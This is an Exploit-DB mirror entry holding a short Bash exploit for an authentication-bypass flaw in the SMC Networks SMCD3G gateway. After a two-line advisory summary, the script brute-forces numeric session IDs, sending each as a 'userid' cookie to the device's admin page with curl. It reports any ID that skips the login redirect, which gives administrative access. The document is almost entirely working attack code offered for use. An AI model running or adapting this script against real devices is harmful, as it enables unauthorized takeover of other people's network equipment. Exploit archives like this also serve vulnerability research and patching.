exploit-db-mirror/exploits/multiple/remote/35316.sh
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
518 B
Bash
Executable file

source: https://www.securityfocus.com/bid/46178/info
The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done